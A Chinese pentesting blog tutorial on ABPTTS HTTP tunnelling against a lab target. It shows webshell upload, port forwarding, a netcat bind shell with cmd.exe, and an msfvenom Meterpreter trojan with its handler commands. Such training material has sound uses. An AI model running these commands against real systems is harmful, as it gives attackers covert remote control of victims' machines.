<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":{"home":"/","about":"/about","tags":"/tags","resources":"/resources","categories":"/categories","schedule":"/schedule"}},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"manual","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="参考资料abptts正向连接cs：http:&#x2F;&#x2F;moy1sec.com&#x2F;2021&#x2F;11&#x2F;02&#x2F;cs-zai-bu-chu-wang-huan-jing-zhong-shang-xian&#x2F;#toc-heading-6 abptts建立正向隧道：https:&#x2F;&#x2F;www.freebuf.com&#x2F;sectool&#x2F;259855.html 通过CrossC2上线linux：https:&#x2F;&#x2F;www.freebu">
<meta property="og:type" content="article">
<meta property="og:title" content="http隧道:abptts端口映射">
<meta property="og:url" content="http://example.com/2022/08/09/http%E9%9A%A7%E9%81%93-abptts%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/index.html">
<meta property="og:site_name" content="小乱的Blog">
<meta property="og:description" content="参考资料abptts正向连接cs：http:&#x2F;&#x2F;moy1sec.com&#x2F;2021&#x2F;11&#x2F;02&#x2F;cs-zai-bu-chu-wang-huan-jing-zhong-shang-xian&#x2F;#toc-heading-6 abptts建立正向隧道：https:&#x2F;&#x2F;www.freebuf.com&#x2F;sectool&#x2F;259855.html 通过CrossC2上线linux：https:&#x2F;&#x2F;www.freebu">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091438399.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091446899.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091501336.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091506718.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208130005428.png">
<meta property="og:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208130008617.png">
<meta property="article:published_time" content="2022-08-09T01:54:03.000Z">
<meta property="article:modified_time" content="2022-08-20T07:50:50.617Z">
<meta property="article:author" content="xiaoluan">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091438399.png">

<link rel="canonical" href="http://example.com/2022/08/09/http%E9%9A%A7%E9%81%93-abptts%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>http隧道:abptts端口映射 | 小乱的Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">小乱的Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-resources">

    <a href="/resources/" rel="section"><i class="fa fa-download fa-fw"></i>资源</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/08/09/http%E9%9A%A7%E9%81%93-abptts%E7%AB%AF%E5%8F%A3%E6%98%A0%E5%B0%84/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="xiaoluan">
      <meta itemprop="description" content="健康 规律 技能">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="小乱的Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          http隧道:abptts端口映射
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-08-09 09:54:03" itemprop="dateCreated datePublished" datetime="2022-08-09T09:54:03+08:00">2022-08-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-08-20 15:50:50" itemprop="dateModified" datetime="2022-08-20T15:50:50+08:00">2022-08-20</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/source/categories/1-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">1.内网渗透</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/source/categories/1-%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/1-%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F/" itemprop="url" rel="index"><span itemprop="name">1.内网穿透</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h3><p>abptts正向连接cs：<a target="_blank" rel="noopener" href="http://moy1sec.com/2021/11/02/cs-zai-bu-chu-wang-huan-jing-zhong-shang-xian/#toc-heading-6">http://moy1sec.com/2021/11/02/cs-zai-bu-chu-wang-huan-jing-zhong-shang-xian/#toc-heading-6</a></p>
<p>abptts建立正向隧道：<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/259855.html">https://www.freebuf.com/sectool/259855.html</a></p>
<p>通过CrossC2上线linux：<a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/334569.html">https://www.freebuf.com/sectool/334569.html</a></p>
<p>带profile上线linux：<a target="_blank" rel="noopener" href="http://www.4k8k.xyz/article/w1590191166/119490557">http://www.4k8k.xyz/article/w1590191166/119490557</a></p>
<h3 id="实现过程"><a href="#实现过程" class="headerlink" title="实现过程"></a>实现过程</h3><p><strong>工具下载</strong></p>
<p><a target="_blank" rel="noopener" href="https://github.com/nccgroup/ABPTTS">https://github.com/nccgroup/ABPTTS</a></p>
<p>abptts可以实现端口对端口映射，且具有全加密对抗检测和稳定的优点，但目前只支持aspx和jsp两种脚本文件</p>
<p>下载后需要安装python2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip install pycrypto</span><br><span class="line">pip install httplib2</span><br></pre></td></tr></table></figure>

<p><strong>搭建隧道</strong></p>
<p>生成服务端，目录下会出现server目录，目录内有不同环境的默认服务端文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python abpttsfactory.py -o server</span><br></pre></td></tr></table></figure>

<p>选择与目标对应环境的服务端上传，访问页面，结果如下图代表服务端运行正常</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091438399.png" alt="image-20220809143854159"></p>
<p>vps执行命令，搭建http隧道</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python2 abpttsclient.py -c server/config.txt -u http://192.168.240.106:81/abptts.jsp -f 127.0.0.1:20011/127.0.0.1:20022</span><br></pre></td></tr></table></figure>

<p>-c 配置文件，生成服务端时一起生成的，在server目录下面</p>
<p>-u 上传的server文件链接</p>
<p>-f 将靶机的20022端口映射到vps的20011端口</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091446899.png" alt="image-20220809144652558"></p>
<p>现在vps的20011端口就相当于靶机的20022端口，20022端口有什么服务，我们都可以通过访问vps的20011端口访问到</p>
<p>比如在靶机20022端口开启nc监听</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc.exe -lvp 20022 -e cmd.exe</span><br></pre></td></tr></table></figure>

<p>vps本机nc本地20011端口，由于该端口接受了靶机20022端口的映射，因此nc本地等同于nc靶机的20022端口</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 127.0.0.1 20011</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091501336.png" alt="image-20220809150140696"></p>
<p>如果搭建隧道时，改为监听所有地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">x python2 abpttsclient.py -c server/config.txt -u http://192.168.240.106:81/abptts.jsp -f 0.0.0.0:20011/127.0.0.1:20022</span><br></pre></td></tr></table></figure>

<p>那么其他主机也可以通过nc VPS的20011端口，去连接靶机</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 192.168.240.54 20011</span><br></pre></td></tr></table></figure>

<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208091506718.png" alt="image-20220809150610784"></p>
<p><strong>利用隧道正向上线msf</strong></p>
<p>abptts命令不变，仍然是把靶机的20022映射到VPS的20011</p>
<p>msf生成木马</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/bind_tcp rhost=127.0.0.1 lport=20022 -f exe -o meterpreter.exe</span><br></pre></td></tr></table></figure>

<p>这里使用bind_tcp模块，如上命令生成的木马，在目标主机执行后，会监听本地的20022端口，等待msf正向连接</p>
<p>-f 指定木马类型</p>
<p>-o 指定木马文件名</p>
<p>把木马通过webshell上传到靶机并执行</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208130005428.png" alt="image-20220813000533284"></p>
<p>msf正向连接</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line"># payload要与生成木马时所有payload一致</span><br><span class="line">set payload windows/meterpreter/bind_tcp</span><br><span class="line">set lport 20011</span><br><span class="line">set rhost 127.0.0.1</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>msf上线成功</p>
<p><img src="https://raw.githubusercontent.com/xiaoluanzzz/images/main/img/202208130008617.png" alt="image-20220813000759535"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/08/07/http%E9%9A%A7%E9%81%93-neo-reGeorg/" rel="prev" title="http隧道:neo-reGeorg">
      <i class="fa fa-chevron-left"></i> http隧道:neo-reGeorg
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/08/18/%E8%BF%90%E7%94%A8%E6%8A%93%E5%8C%85%E5%B7%A5%E5%85%B7%E5%9C%A8%E5%86%85%E7%BD%91%E8%BE%BE%E5%88%B0dnslog%E6%95%88%E6%9E%9C/" rel="next" title="运用抓包工具在内网达到dnslog效果">
      运用抓包工具在内网达到dnslog效果 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="lv-container" data-id="city" data-uid="MTAyMC81MzU2MC8zMDAzMw=="></div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="nav-number">1.</span> <span class="nav-text">参考资料</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%9E%E7%8E%B0%E8%BF%87%E7%A8%8B"><span class="nav-number">2.</span> <span class="nav-text">实现过程</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="xiaoluan"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">xiaoluan</p>
  <div class="site-description" itemprop="description">健康 规律 技能</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">53</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">31</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2021-08 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xiaoluan</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>
<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共36.8k字</span>
</div>

    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script>
NexT.utils.loadComments(document.querySelector('#lv-container'), () => {
  window.livereOptions = {
    refer: location.pathname.replace(CONFIG.root, '').replace('index.html', '')
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
});
</script>

</body>
</html>
